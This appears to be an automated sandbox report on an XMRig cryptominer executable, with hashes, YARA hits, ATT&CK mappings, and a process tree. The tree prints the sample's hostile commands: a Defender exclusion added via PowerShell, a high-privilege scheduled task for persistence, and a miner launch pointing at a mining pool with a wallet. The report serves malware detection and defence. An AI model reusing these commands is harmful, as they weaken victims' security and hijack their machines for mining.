xmrig | 27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a

General

Target

27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe
Size

3.4MB
MD5

65ab4f193c14c449fbb20856f35fe821
SHA1

6c2d4f7ad6f72fdaee6826746c6733e88d9aa6ef
SHA256

27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a
SHA512

347d7b4d98d3021970faf05f0baf15257f2ddf216b979fcee81e886b785734e467eb52709d55edd86368befe5a243226763d1daaba032c266ca324c51dbbe2a9
SSDEEP

98304:VCpnbyvt7sJj6gGNUjqG/74lMHQFqvctGt7b05Nb:VmnWvt7sJegmUWe74lmHctQ/ab

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2300-132-0x0000000000CF0000-0x0000000001130000-memory.dmp	net_reactor

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/4244-181-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/4244-182-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/4244-183-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/4244-184-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/4244-188-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/4244-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2300 set thread context of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe
2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe
Token: SeUndockPrivilege	2960	powershell.exe
Token: SeManageVolumePrivilege	2960	powershell.exe
Token: 33	2960	powershell.exe
Token: 34	2960	powershell.exe
Token: 35	2960	powershell.exe
Token: 36	2960	powershell.exe
Token: SeLockMemoryPrivilege	4244	vbc.exe
Token: SeLockMemoryPrivilege	4244	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4244	vbc.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 2960	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	66
PID 2300 wrote to memory of 2960	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	66
PID 2300 wrote to memory of 4128	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	69
PID 2300 wrote to memory of 4128	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	69
PID 4128 wrote to memory of 1348	4128	cmd.exe	71
PID 4128 wrote to memory of 1348	4128	cmd.exe	71
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73
PID 2300 wrote to memory of 4244	2300	27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe	73

C:\Users\Admin\AppData\Local\Temp\27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe
"C:\Users\Admin\AppData\Local\Temp\27c42aebc39aba02adf40695d356b2c82491b9e9df5e2f8672c2c2c7b0fce16a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1348
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4244

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Scripting

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2300-131-0x00007FF9D1220000-0x00007FF9D1C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2300-123-0x00007FF9EC0B0000-0x00007FF9EC14D000-memory.dmp

Filesize
628KB

Download
memory/2300-125-0x00007FF9EC290000-0x00007FF9EC2B7000-memory.dmp

Filesize
156KB

Download
memory/2300-126-0x00007FF9EBA50000-0x00007FF9EBB9A000-memory.dmp

Filesize
1.3MB

Download
memory/2300-127-0x00007FF9E8AF0000-0x00007FF9E8B01000-memory.dmp

Filesize
68KB

Download
memory/2300-128-0x00007FF9E0160000-0x00007FF9E0257000-memory.dmp

Filesize
988KB

Download
memory/2300-130-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/2300-129-0x0000000000CF0000-0x0000000001130000-memory.dmp

Filesize
4.2MB

Download
memory/2300-122-0x00007FF9E0410000-0x00007FF9E04AC000-memory.dmp

Filesize
624KB

Download
memory/2300-132-0x0000000000CF0000-0x0000000001130000-memory.dmp

Filesize
4.2MB

Download
memory/2300-133-0x00007FF9DFFD0000-0x00007FF9E00FC000-memory.dmp

Filesize
1.2MB

Download
memory/2300-134-0x00007FF9E8980000-0x00007FF9E89A5000-memory.dmp

Filesize
148KB

Download
memory/2300-195-0x0000000000CF0000-0x0000000001130000-memory.dmp

Filesize
4.2MB

Download
memory/2300-180-0x00007FF9E8100000-0x00007FF9E8137000-memory.dmp

Filesize
220KB

Download
memory/2300-179-0x00007FF9EC380000-0x00007FF9EC3EC000-memory.dmp

Filesize
432KB

Download
memory/2300-174-0x0000000000800000-0x0000000000843000-memory.dmp

Filesize
268KB

Download
memory/2300-124-0x00007FF9EB860000-0x00007FF9EB90E000-memory.dmp

Filesize
696KB

Download
memory/2300-178-0x00007FF9DF730000-0x00007FF9DF7FC000-memory.dmp

Filesize
816KB

Download
memory/2300-177-0x00007FF9E0C40000-0x00007FF9E0C65000-memory.dmp

Filesize
148KB

Download
memory/2960-145-0x000001C4F6510000-0x000001C4F6586000-memory.dmp

Filesize
472KB

Download
memory/2960-141-0x000001C4F4380000-0x000001C4F43A2000-memory.dmp

Filesize
136KB

Download
memory/4244-188-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4244-183-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4244-184-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4244-189-0x000001DACA750000-0x000001DACA770000-memory.dmp

Filesize
128KB

Download
memory/4244-185-0x000001DACA6F0000-0x000001DACA710000-memory.dmp

Filesize
128KB

Download
memory/4244-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4244-191-0x000001DACC010000-0x000001DACC030000-memory.dmp

Filesize
128KB

Download
memory/4244-192-0x000001DACC030000-0x000001DACC050000-memory.dmp

Filesize
128KB

Download
memory/4244-193-0x000001DACC010000-0x000001DACC030000-memory.dmp

Filesize
128KB

Download
memory/4244-194-0x000001DACC030000-0x000001DACC050000-memory.dmp

Filesize
128KB

Download
memory/4244-181-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads